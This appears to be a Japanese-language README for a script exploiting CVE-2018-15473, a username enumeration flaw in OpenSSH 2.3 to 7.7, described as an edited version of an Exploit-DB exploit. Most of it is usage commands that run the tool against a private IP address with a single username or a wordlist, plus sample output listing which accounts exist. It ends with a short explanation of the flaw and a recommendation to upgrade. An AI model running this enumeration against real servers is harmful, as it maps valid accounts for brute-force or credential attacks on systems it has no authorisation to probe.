
SSHユーザー名列挙エクスプロイト (OpenSSH 2.3 < 7.7)
元のエクスプロイトの編集版: https://www.exploit-db.com/exploits/45233
#Ensure that you install the requirements:
foo@bar:~$ pip3 install -r requirements.txt
#For single username:
foo@bar:~$ ./CVE-2018-15473.py 192.168.1.20 -u root
[+] root is a valid username
#For multiple username:
foo@bar:~$ ./CVE-2018-15473.py 192.168.1.20 -w username_wordlist.txt
[+] root is a valid username
[-] mysql is an invalid username
[-] mike is an invalid username
[-] foo is an invalid username
[-] bar is an invalid username
Valid Users:
root
#For more option:
foo@bar:~$ ./CVE-2018-15473.py -h
システムは有効な認証試行と無効な認証試行に対して異なる応答を返します。リモートのユーザーは特別に細工したリクエストを送信することで、ターゲットシステム上の有効なユーザー名を特定できます。これにより、リモートユーザーはターゲットシステム上の有効なユーザー名を特定できます。
OpenSSHサーバーをバージョン7.7以上にアップグレードする必要があります。